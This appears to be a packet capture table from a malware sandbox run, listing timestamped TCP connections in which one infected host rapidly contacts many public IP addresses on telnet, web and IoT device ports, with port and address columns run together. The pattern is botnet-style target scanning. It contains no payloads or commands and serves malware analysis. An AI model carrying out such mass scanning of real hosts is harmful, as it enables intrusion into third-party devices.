                                                                        Dec 6, 2024 00:37:27.005753040 CET4197323192.168.2.23107.140.92.96
                                                                        Dec 6, 2024 00:37:27.005753994 CET234197370.131.205.230192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005764008 CET2341973130.15.39.202192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005774021 CET2341973179.252.170.138192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005776882 CET419732323192.168.2.2337.172.122.116
                                                                        Dec 6, 2024 00:37:27.005783081 CET234197317.33.138.135192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005791903 CET234197387.112.145.230192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005791903 CET4197323192.168.2.2370.131.205.230
                                                                        Dec 6, 2024 00:37:27.005798101 CET4197323192.168.2.23130.15.39.202
                                                                        Dec 6, 2024 00:37:27.005798101 CET4197323192.168.2.23179.252.170.138
                                                                        Dec 6, 2024 00:37:27.005803108 CET234197346.7.209.94192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005810022 CET4197323192.168.2.2317.33.138.135
                                                                        Dec 6, 2024 00:37:27.005814075 CET234197353.96.106.18192.168.2.23
                                                                        Dec 6, 2024 00:37:27.005821943 CET4197323192.168.2.2387.112.145.230
                                                                        Dec 6, 2024 00:37:27.005831003 CET4197323192.168.2.2346.7.209.94
                                                                        Dec 6, 2024 00:37:27.005841017 CET4197323192.168.2.2353.96.106.18
                                                                        Dec 6, 2024 00:37:27.006211042 CET2341973222.143.156.101192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006220102 CET2341973210.117.218.254192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006227970 CET232341973120.247.143.220192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006236076 CET2341973200.105.200.246192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006244898 CET4197323192.168.2.23210.117.218.254
                                                                        Dec 6, 2024 00:37:27.006252050 CET4197323192.168.2.23222.143.156.101
                                                                        Dec 6, 2024 00:37:27.006258011 CET419732323192.168.2.23120.247.143.220
                                                                        Dec 6, 2024 00:37:27.006272078 CET4197323192.168.2.23200.105.200.246
                                                                        Dec 6, 2024 00:37:27.006283045 CET234197387.62.107.242192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006304979 CET234197343.145.184.1192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006314993 CET2341973152.78.84.220192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006315947 CET4197323192.168.2.2387.62.107.242
                                                                        Dec 6, 2024 00:37:27.006328106 CET2341973113.3.117.16192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006344080 CET2341973213.94.183.11192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006346941 CET4197323192.168.2.23152.78.84.220
                                                                        Dec 6, 2024 00:37:27.006350040 CET4197323192.168.2.2343.145.184.1
                                                                        Dec 6, 2024 00:37:27.006360054 CET4197323192.168.2.23113.3.117.16
                                                                        Dec 6, 2024 00:37:27.006369114 CET2341973204.202.228.45192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006380081 CET2341973219.110.52.166192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006383896 CET4197323192.168.2.23213.94.183.11
                                                                        Dec 6, 2024 00:37:27.006390095 CET232341973152.32.61.157192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006400108 CET234197341.54.38.94192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006406069 CET4197323192.168.2.23204.202.228.45
                                                                        Dec 6, 2024 00:37:27.006414890 CET4197323192.168.2.23219.110.52.166
                                                                        Dec 6, 2024 00:37:27.006418943 CET419732323192.168.2.23152.32.61.157
                                                                        Dec 6, 2024 00:37:27.006423950 CET4197323192.168.2.2341.54.38.94
                                                                        Dec 6, 2024 00:37:27.006428957 CET2341973125.180.96.100192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006441116 CET2341973157.255.25.123192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006467104 CET4197323192.168.2.23125.180.96.100
                                                                        Dec 6, 2024 00:37:27.006469011 CET234197335.88.104.12192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006481886 CET4197323192.168.2.23157.255.25.123
                                                                        Dec 6, 2024 00:37:27.006494999 CET2341973119.146.155.199192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006508112 CET4197323192.168.2.2335.88.104.12
                                                                        Dec 6, 2024 00:37:27.006526947 CET234197343.65.80.74192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006530046 CET4197323192.168.2.23119.146.155.199
                                                                        Dec 6, 2024 00:37:27.006561995 CET2341973174.105.42.195192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006565094 CET4197323192.168.2.2343.65.80.74
                                                                        Dec 6, 2024 00:37:27.006572008 CET2341973187.153.59.58192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006601095 CET4197323192.168.2.23174.105.42.195
                                                                        Dec 6, 2024 00:37:27.006612062 CET4197323192.168.2.23187.153.59.58
                                                                        Dec 6, 2024 00:37:27.006649971 CET2341973184.7.125.25192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006659985 CET2323419739.49.154.247192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006669044 CET2341973166.14.233.19192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006680012 CET2341973135.79.24.67192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006685972 CET4197323192.168.2.23184.7.125.25
                                                                        Dec 6, 2024 00:37:27.006688118 CET419732323192.168.2.239.49.154.247
                                                                        Dec 6, 2024 00:37:27.006689072 CET2341973124.9.235.67192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006695986 CET4197323192.168.2.23166.14.233.19
                                                                        Dec 6, 2024 00:37:27.006700039 CET2341973102.31.114.187192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006709099 CET4197323192.168.2.23135.79.24.67
                                                                        Dec 6, 2024 00:37:27.006711006 CET2341973168.110.93.9192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006721973 CET2341973161.161.208.200192.168.2.23
                                                                        Dec 6, 2024 00:37:27.006725073 CET4197323192.168.2.23124.9.235.67
                                                                        Dec 6, 2024 00:37:27.006727934 CET4197323192.168.2.23102.31.114.187
                                                                        Dec 6, 2024 00:37:27.006747961 CET4197323192.168.2.23168.110.93.9
                                                                        Dec 6, 2024 00:37:27.006752968 CET4197323192.168.2.23161.161.208.200
                                                                        Dec 6, 2024 00:37:27.007177114 CET234197360.203.236.217192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007188082 CET234197337.158.96.165192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007219076 CET4197323192.168.2.2360.203.236.217
                                                                        Dec 6, 2024 00:37:27.007220030 CET4197323192.168.2.2337.158.96.165
                                                                        Dec 6, 2024 00:37:27.007231951 CET234197323.199.250.23192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007241964 CET232341973162.242.174.67192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007251024 CET2341973198.207.76.191192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007270098 CET4197323192.168.2.2323.199.250.23
                                                                        Dec 6, 2024 00:37:27.007273912 CET419732323192.168.2.23162.242.174.67
                                                                        Dec 6, 2024 00:37:27.007276058 CET4197323192.168.2.23198.207.76.191
                                                                        Dec 6, 2024 00:37:27.007281065 CET2341973111.47.129.84192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007291079 CET234197395.200.127.183192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007311106 CET2341973178.251.133.30192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007333040 CET4197323192.168.2.2395.200.127.183
                                                                        Dec 6, 2024 00:37:27.007344961 CET4197323192.168.2.23111.47.129.84
                                                                        Dec 6, 2024 00:37:27.007352114 CET4197323192.168.2.23178.251.133.30
                                                                        Dec 6, 2024 00:37:27.007515907 CET234197343.238.189.48192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007533073 CET2341973198.103.249.80192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007541895 CET2341973194.195.196.90192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007551908 CET2341973170.158.236.133192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007555962 CET4197323192.168.2.2343.238.189.48
                                                                        Dec 6, 2024 00:37:27.007560015 CET4197323192.168.2.23198.103.249.80
                                                                        Dec 6, 2024 00:37:27.007565975 CET232341973186.143.158.197192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007570982 CET4197323192.168.2.23194.195.196.90
                                                                        Dec 6, 2024 00:37:27.007589102 CET4197323192.168.2.23170.158.236.133
                                                                        Dec 6, 2024 00:37:27.007590055 CET234197336.192.17.250192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007600069 CET419732323192.168.2.23186.143.158.197
                                                                        Dec 6, 2024 00:37:27.007601023 CET2341973116.175.37.28192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007611036 CET2341973221.89.101.59192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007622004 CET2341973218.66.188.104192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007630110 CET2341973193.185.209.135192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007630110 CET4197323192.168.2.23116.175.37.28
                                                                        Dec 6, 2024 00:37:27.007630110 CET4197323192.168.2.2336.192.17.250
                                                                        Dec 6, 2024 00:37:27.007637978 CET4197323192.168.2.23221.89.101.59
                                                                        Dec 6, 2024 00:37:27.007641077 CET2341973198.50.213.199192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007647038 CET4197323192.168.2.23218.66.188.104
                                                                        Dec 6, 2024 00:37:27.007649899 CET2341973213.67.227.174192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007657051 CET4197323192.168.2.23193.185.209.135
                                                                        Dec 6, 2024 00:37:27.007675886 CET4197323192.168.2.23198.50.213.199
                                                                        Dec 6, 2024 00:37:27.007689953 CET4197323192.168.2.23213.67.227.174
                                                                        Dec 6, 2024 00:37:27.007714033 CET2341973109.42.176.104192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007725000 CET234197378.184.102.102192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007734060 CET234197341.71.142.247192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007744074 CET23234197369.189.33.172192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007750988 CET4197323192.168.2.23109.42.176.104
                                                                        Dec 6, 2024 00:37:27.007752895 CET2341973152.203.96.245192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007754087 CET4197323192.168.2.2378.184.102.102
                                                                        Dec 6, 2024 00:37:27.007762909 CET2341973191.67.235.201192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007774115 CET2341973204.166.199.200192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007776976 CET4197323192.168.2.2341.71.142.247
                                                                        Dec 6, 2024 00:37:27.007777929 CET419732323192.168.2.2369.189.33.172
                                                                        Dec 6, 2024 00:37:27.007785082 CET234197348.140.136.25192.168.2.23
                                                                        Dec 6, 2024 00:37:27.007787943 CET4197323192.168.2.23152.203.96.245
                                                                        Dec 6, 2024 00:37:27.007796049 CET4197323192.168.2.23191.67.235.201
                                                                        Dec 6, 2024 00:37:27.007818937 CET4197323192.168.2.2348.140.136.25
                                                                        Dec 6, 2024 00:37:27.007819891 CET4197323192.168.2.23204.166.199.200
                                                                        Dec 6, 2024 00:37:27.008053064 CET2341973167.17.223.1192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008063078 CET2341973218.87.201.213192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008096933 CET4197323192.168.2.23167.17.223.1
                                                                        Dec 6, 2024 00:37:27.008097887 CET4197323192.168.2.23218.87.201.213
                                                                        Dec 6, 2024 00:37:27.008121014 CET2341973170.227.180.225192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008131027 CET2341973193.200.222.15192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008140087 CET2341973216.171.19.173192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008157015 CET232341973145.111.49.117192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008162022 CET4197323192.168.2.23193.200.222.15
                                                                        Dec 6, 2024 00:37:27.008167028 CET4197323192.168.2.23170.227.180.225
                                                                        Dec 6, 2024 00:37:27.008173943 CET4197323192.168.2.23216.171.19.173
                                                                        Dec 6, 2024 00:37:27.008173943 CET234197318.141.219.75192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008192062 CET419732323192.168.2.23145.111.49.117
                                                                        Dec 6, 2024 00:37:27.008205891 CET4197323192.168.2.2318.141.219.75
                                                                        Dec 6, 2024 00:37:27.008217096 CET234197337.176.5.184192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008233070 CET234197342.155.239.97192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008251905 CET4197323192.168.2.2337.176.5.184
                                                                        Dec 6, 2024 00:37:27.008250952 CET2341973195.54.58.176192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008270979 CET234197318.201.83.169192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008274078 CET4197323192.168.2.2342.155.239.97
                                                                        Dec 6, 2024 00:37:27.008294106 CET4197323192.168.2.23195.54.58.176
                                                                        Dec 6, 2024 00:37:27.008301973 CET4197323192.168.2.2318.201.83.169
                                                                        Dec 6, 2024 00:37:27.008331060 CET234197338.130.68.173192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008343935 CET234197365.247.240.187192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008357048 CET2341973112.64.219.27192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008367062 CET234197324.247.166.126192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008368015 CET4197323192.168.2.2338.130.68.173
                                                                        Dec 6, 2024 00:37:27.008368969 CET4197323192.168.2.2365.247.240.187
                                                                        Dec 6, 2024 00:37:27.008387089 CET232341973169.24.225.43192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008388996 CET4197323192.168.2.23112.64.219.27
                                                                        Dec 6, 2024 00:37:27.008398056 CET2341973216.4.241.162192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008399963 CET4197323192.168.2.2324.247.166.126
                                                                        Dec 6, 2024 00:37:27.008408070 CET234197313.74.206.171192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008424044 CET419732323192.168.2.23169.24.225.43
                                                                        Dec 6, 2024 00:37:27.008430958 CET4197323192.168.2.23216.4.241.162
                                                                        Dec 6, 2024 00:37:27.008438110 CET4197323192.168.2.2313.74.206.171
                                                                        Dec 6, 2024 00:37:27.008503914 CET234197378.29.251.67192.168.2.23
                                                                        Dec 6, 2024 00:37:27.008542061 CET4197323192.168.2.2378.29.251.67
                                                                        Dec 6, 2024 00:37:27.055908918 CET3590280192.168.2.2372.133.244.12
                                                                        Dec 6, 2024 00:37:27.055913925 CET490428080192.168.2.2380.79.75.130
                                                                        Dec 6, 2024 00:37:27.055919886 CET5879680192.168.2.23135.195.106.66
                                                                        Dec 6, 2024 00:37:27.055919886 CET580368080192.168.2.23168.177.221.9
                                                                        Dec 6, 2024 00:37:27.055922985 CET4802449152192.168.2.23109.21.59.119
                                                                        Dec 6, 2024 00:37:27.055922985 CET6081849152192.168.2.23180.14.14.162
                                                                        Dec 6, 2024 00:37:27.055938005 CET332405555192.168.2.2346.154.107.107
                                                                        Dec 6, 2024 00:37:27.055938959 CET501628443192.168.2.2394.51.143.66
                                                                        Dec 6, 2024 00:37:27.055948973 CET5505881192.168.2.23159.139.93.221
                                                                        Dec 6, 2024 00:37:27.055949926 CET4018880192.168.2.23114.97.132.46
                                                                        Dec 6, 2024 00:37:27.055949926 CET3372249152192.168.2.2378.12.225.52
                                                                        Dec 6, 2024 00:37:27.055953026 CET523168080192.168.2.23135.126.129.9
                                                                        Dec 6, 2024 00:37:27.055954933 CET3497881192.168.2.2344.225.35.88
                                                                        Dec 6, 2024 00:37:27.055960894 CET401488443192.168.2.23135.164.100.224
                                                                        Dec 6, 2024 00:37:27.055963993 CET3504081192.168.2.236.189.3.213
                                                                        Dec 6, 2024 00:37:27.055964947 CET4619281192.168.2.2397.26.138.219
                                                                        Dec 6, 2024 00:37:27.055969954 CET5022281192.168.2.2367.26.75.18
                                                                        Dec 6, 2024 00:37:27.087898016 CET4548480192.168.2.23139.135.210.223
                                                                        Dec 6, 2024 00:37:27.087898016 CET3962280192.168.2.23157.36.53.29
                                                                        Dec 6, 2024 00:37:27.087901115 CET4224680192.168.2.23120.89.24.126
                                                                        Dec 6, 2024 00:37:27.087901115 CET412968080192.168.2.23162.55.212.5
                                                                        Dec 6, 2024 00:37:27.087918997 CET5887681192.168.2.23188.72.85.37
                                                                        Dec 6, 2024 00:37:27.087919950 CET5550280192.168.2.23204.116.135.152
                                                                        Dec 6, 2024 00:37:27.087920904 CET3985237215192.168.2.23222.125.46.14
                                                                        Dec 6, 2024 00:37:27.087920904 CET4745252869192.168.2.23129.36.10.203
                                                                        Dec 6, 2024 00:37:27.087929964 CET520908080192.168.2.2328.200.38.50
                                                                        Dec 6, 2024 00:37:27.087939978 CET3705480192.168.2.2366.147.109.56
                                                                        Dec 6, 2024 00:37:27.087939978 CET530925555192.168.2.23186.155.138.63
                                                                        Dec 6, 2024 00:37:27.087943077 CET3839237215192.168.2.2389.182.235.65
                                                                        Dec 6, 2024 00:37:27.087948084 CET475628080192.168.2.233.136.140.156
                                                                        Dec 6, 2024 00:37:27.087955952 CET4884437215192.168.2.23104.21.14.23
                                                                        Dec 6, 2024 00:37:27.087956905 CET4867452869192.168.2.23105.55.86.99
                                                                        Dec 6, 2024 00:37:27.087960958 CET587365555192.168.2.2321.9.78.189
                                                                        Dec 6, 2024 00:37:27.087960958 CET522388443192.168.2.23161.221.155.50
                                                                        Dec 6, 2024 00:37:27.087960958 CET5471481192.168.2.2371.134.34.195
                                                                        Dec 6, 2024 00:37:27.087970972 CET4117280192.168.2.2378.224.153.204
                                                                        Dec 6, 2024 00:37:27.087976933 CET4631849152192.168.2.2325.81.31.92
                                                                        Dec 6, 2024 00:37:27.087976933 CET341448080192.168.2.2335.7.157.194
                                                                        Dec 6, 2024 00:37:27.087984085 CET3771237215192.168.2.23120.234.71.113
                                                                        Dec 6, 2024 00:37:27.087986946 CET6084449152192.168.2.23198.51.200.4
                                                                        Dec 6, 2024 00:37:27.087986946 CET549568443192.168.2.23169.136.171.41
                                                                        Dec 6, 2024 00:37:27.087990046 CET3898480192.168.2.23118.180.224.35
                                                                        Dec 6, 2024 00:37:27.087990046 CET5150280192.168.2.23208.89.103.91
                                                                        Dec 6, 2024 00:37:27.088007927 CET5311880192.168.2.2351.113.150.12
                                                                        Dec 6, 2024 00:37:27.088009119 CET422588080192.168.2.2371.196.229.150
                                                                        Dec 6, 2024 00:37:27.088015079 CET4873437215192.168.2.23117.126.26.124
                                                                        Dec 6, 2024 00:37:27.088015079 CET5920480192.168.2.2391.228.216.195
                                                                        Dec 6, 2024 00:37:27.088015079 CET3827880192.168.2.23189.94.14.160
                                                                        Dec 6, 2024 00:37:27.088016033 CET547125555192.168.2.23162.132.229.135
                                                                        Dec 6, 2024 00:37:27.119916916 CET431348080192.168.2.2312.192.0.3
                                                                        Dec 6, 2024 00:37:27.119918108 CET491588080192.168.2.2378.54.102.47
                                                                        Dec 6, 2024 00:37:27.119921923 CET5219880192.168.2.2375.39.160.17
                                                                        Dec 6, 2024 00:37:27.119921923 CET356688443192.168.2.23110.136.23.91
                                                                        Dec 6, 2024 00:37:27.119929075 CET3734280192.168.2.23132.188.66.237
                                                                        Dec 6, 2024 00:37:27.119930029 CET4978081192.168.2.2341.207.251.25
                                                                        Dec 6, 2024 00:37:27.119937897 CET4393280192.168.2.2392.101.130.81
                                                                        Dec 6, 2024 00:37:27.119939089 CET4755681192.168.2.23131.125.49.114
                                                                        Dec 6, 2024 00:37:27.119942904 CET485868080192.168.2.23219.141.94.102
                                                                        Dec 6, 2024 00:37:27.119946003 CET5964480192.168.2.2333.203.45.114
                                                                        Dec 6, 2024 00:37:27.119951963 CET586108080192.168.2.2393.105.53.36
                                                                        Dec 6, 2024 00:37:27.119952917 CET3977681192.168.2.2333.159.39.237
                                                                        Dec 6, 2024 00:37:27.119962931 CET519328080192.168.2.23107.253.16.191
                                                                        Dec 6, 2024 00:37:27.119961023 CET541868080192.168.2.23139.215.52.168
                                                                        Dec 6, 2024 00:37:27.119971991 CET574048080192.168.2.2370.210.32.219
                                                                        Dec 6, 2024 00:37:27.119973898 CET4345652869192.168.2.23155.186.213.135
                                                                        Dec 6, 2024 00:37:27.119975090 CET604105555192.168.2.2394.85.120.28
                                                                        Dec 6, 2024 00:37:27.119982958 CET5621680192.168.2.23161.61.64.242
                                                                        Dec 6, 2024 00:37:27.172225952 CET803590272.133.244.12192.168.2.23
                                                                        Dec 6, 2024 00:37:27.172238111 CET80804904280.79.75.130192.168.2.23
                                                                        Dec 6, 2024 00:37:27.172247887 CET8058796135.195.106.66192.168.2.23
                                                                        Dec 6, 2024 00:37:27.172286987 CET5879680192.168.2.23135.195.106.66
                                                                        Dec 6, 2024 00:37:27.172291040 CET3590280192.168.2.2372.133.244.12
                                                                        Dec 6, 2024 00:37:27.172293901 CET490428080192.168.2.2380.79.75.130
                                                                        Dec 6, 2024 00:37:27.177845001 CET808058036168.177.221.9192.168.2.23
                                                                        Dec 6, 2024 00:37:27.177855968 CET55553324046.154.107.107192.168.2.23
                                                                        Dec 6, 2024 00:37:27.177864075 CET4915248024109.21.59.119192.168.2.23
                                                                        Dec 6, 2024 00:37:27.177895069 CET580368080192.168.2.23168.177.221.9
                                                                        Dec 6, 2024 00:37:27.177906036 CET4802449152192.168.2.23109.21.59.119
                                                                        Dec 6, 2024 00:37:27.177911997 CET332405555192.168.2.2346.154.107.107
                                                                        Dec 6, 2024 00:37:27.181725979 CET84435016294.51.143.66192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181736946 CET4915260818180.14.14.162192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181766033 CET501628443192.168.2.2394.51.143.66
                                                                        Dec 6, 2024 00:37:27.181773901 CET6081849152192.168.2.23180.14.14.162
                                                                        Dec 6, 2024 00:37:27.181823969 CET8155058159.139.93.221192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181834936 CET808052316135.126.129.9192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181843996 CET8040188114.97.132.46192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181854010 CET491523372278.12.225.52192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181862116 CET813497844.225.35.88192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181862116 CET5505881192.168.2.23159.139.93.221
                                                                        Dec 6, 2024 00:37:27.181875944 CET523168080192.168.2.23135.126.129.9
                                                                        Dec 6, 2024 00:37:27.181890965 CET4018880192.168.2.23114.97.132.46
                                                                        Dec 6, 2024 00:37:27.181890965 CET3372249152192.168.2.2378.12.225.52
                                                                        Dec 6, 2024 00:37:27.181911945 CET3497881192.168.2.2344.225.35.88
                                                                        Dec 6, 2024 00:37:27.181927919 CET844340148135.164.100.224192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181938887 CET81350406.189.3.213192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181946993 CET814619297.26.138.219192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181956053 CET815022267.26.75.18192.168.2.23
                                                                        Dec 6, 2024 00:37:27.181967020 CET401488443192.168.2.23135.164.100.224
                                                                        Dec 6, 2024 00:37:27.181968927 CET3504081192.168.2.236.189.3.213
                                                                        Dec 6, 2024 00:37:27.181974888 CET4619281192.168.2.2397.26.138.219
                                                                        Dec 6, 2024 00:37:27.181984901 CET5022281192.168.2.2367.26.75.18
                                                                        Dec 6, 2024 00:37:27.213296890 CET8045484139.135.210.223192.168.2.23
                                                                        Dec 6, 2024 00:37:27.213339090 CET8042246120.89.24.126192.168.2.23
                                                                        Dec 6, 2024 00:37:27.213340998 CET4548480192.168.2.23139.135.210.223
                                                                        Dec 6, 2024 00:37:27.213349104 CET8039622157.36.53.29192.168.2.23
                                                                        Dec 6, 2024 00:37:27.213413000 CET4224680192.168.2.23120.89.24.126
                                                                        Dec 6, 2024 00:37:27.213417053 CET3962280192.168.2.23157.36.53.29
                                                                        Dec 6, 2024 00:37:27.236618996 CET80804915878.54.102.47192.168.2.23
                                                                        Dec 6, 2024 00:37:27.236629963 CET80804313412.192.0.3192.168.2.23
                                                                        Dec 6, 2024 00:37:27.236637115 CET805219875.39.160.17192.168.2.23
                                                                        Dec 6, 2024 00:37:27.236673117 CET431348080192.168.2.2312.192.0.3
                                                                        Dec 6, 2024 00:37:27.236673117 CET491588080192.168.2.2378.54.102.47
                                                                        Dec 6, 2024 00:37:27.236679077 CET5219880192.168.2.2375.39.160.17
                                                                        Dec 6, 2024 00:37:27.268714905 CET3790680192.168.2.2395.84.60.197
                                                                        Dec 6, 2024 00:37:27.335073948 CET3590280192.168.2.2372.133.244.12
                                                                        Dec 6, 2024 00:37:27.335108042 CET4802449152192.168.2.23109.21.59.119
                                                                        Dec 6, 2024 00:37:27.335854053 CET490428080192.168.2.2380.79.75.130
                                                                        Dec 6, 2024 00:37:27.335885048 CET580368080192.168.2.23168.177.221.9
                                                                        Dec 6, 2024 00:37:27.335896969 CET5879680192.168.2.23135.195.106.66
                                                                        Dec 6, 2024 00:37:27.335933924 CET6081849152192.168.2.23180.14.14.162
                                                                        Dec 6, 2024 00:37:27.335958958 CET332405555192.168.2.2346.154.107.107
                                                                        Dec 6, 2024 00:37:27.336350918 CET501628443192.168.2.2394.51.143.66
                                                                        Dec 6, 2024 00:37:27.338165998 CET5505881192.168.2.23159.139.93.221
                                                                        Dec 6, 2024 00:37:27.338534117 CET4018880192.168.2.23114.97.132.46
                                                                        Dec 6, 2024 00:37:27.338562965 CET3372249152192.168.2.2378.12.225.52
                                                                        Dec 6, 2024 00:37:27.338582993 CET523168080192.168.2.23135.126.129.9
                                                                        Dec 6, 2024 00:37:27.338603020 CET3497881192.168.2.2344.225.35.88
                                                                        Dec 6, 2024 00:37:27.338619947 CET401488443192.168.2.23135.164.100.224
                                                                        Dec 6, 2024 00:37:27.339359045 CET4619281192.168.2.2397.26.138.219
                                                                        Dec 6, 2024 00:37:27.339740992 CET3504081192.168.2.236.189.3.213
                                                                        Dec 6, 2024 00:37:27.339759111 CET5022281192.168.2.2367.26.75.18
                                                                        Dec 6, 2024 00:37:27.348478079 CET4548480192.168.2.23139.135.210.223
                                                                        Dec 6, 2024 00:37:27.349946022 CET3962280192.168.2.23157.36.53.29
                                                                        Dec 6, 2024 00:37:27.349966049 CET4224680192.168.2.23120.89.24.126
                                                                        Dec 6, 2024 00:37:27.368772030 CET491588080192.168.2.2378.54.102.47
                                                                        Dec 6, 2024 00:37:27.368788958 CET431348080192.168.2.2312.192.0.3
                                                                        Dec 6, 2024 00:37:27.368807077 CET5219880192.168.2.2375.39.160.17
                                                                        Dec 6, 2024 00:37:27.401542902 CET803790695.84.60.197192.168.2.23
                                                                        Dec 6, 2024 00:37:27.401607990 CET3790680192.168.2.2395.84.60.197
                                                                        Dec 6, 2024 00:37:27.457056046 CET803590272.133.244.12192.168.2.23
                                                                        Dec 6, 2024 00:37:27.457103014 CET4915248024109.21.59.119192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458277941 CET80804904280.79.75.130192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458338976 CET808058036168.177.221.9192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458348989 CET8058796135.195.106.66192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458595991 CET4915260818180.14.14.162192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458619118 CET55553324046.154.107.107192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458628893 CET84435016294.51.143.66192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458695889 CET8155058159.139.93.221192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458704948 CET8040188114.97.132.46192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458770990 CET491523372278.12.225.52192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458859921 CET808052316135.126.129.9192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458884001 CET813497844.225.35.88192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458899021 CET844340148135.164.100.224192.168.2.23
                                                                        Dec 6, 2024 00:37:27.458908081 CET814619297.26.138.219192.168.2.23
                                                                        Dec 6, 2024 00:37:27.459723949 CET81350406.189.3.213192.168.2.23
                                                                        Dec 6, 2024 00:37:27.459738016 CET815022267.26.75.18192.168.2.23
                                                                        Dec 6, 2024 00:37:27.470419884 CET8045484139.135.210.223192.168.2.23
                                                                        Dec 6, 2024 00:37:27.472023010 CET8039622157.36.53.29192.168.2.23
                                                                        Dec 6, 2024 00:37:27.472067118 CET8042246120.89.24.126192.168.2.23
                                                                        Dec 6, 2024 00:37:27.485261917 CET80804915878.54.102.47192.168.2.23
                                                                        Dec 6, 2024 00:37:27.488708973 CET80804313412.192.0.3192.168.2.23
                                                                        Dec 6, 2024 00:37:27.488738060 CET805219875.39.160.17192.168.2.23
                                                                        Dec 6, 2024 00:37:27.578681946 CET3790680192.168.2.2395.84.60.197
                                                                        Dec 6, 2024 00:37:27.698285103 CET803790695.84.60.197192.168.2.23
                                                                        Dec 6, 2024 00:37:27.837626934 CET339845555192.168.2.23115.161.205.163
                                                                        Dec 6, 2024 00:37:27.837970018 CET3665080192.168.2.231.22.227.114
                                                                        Dec 6, 2024 00:37:27.838335991 CET560168080192.168.2.23165.5.22.254
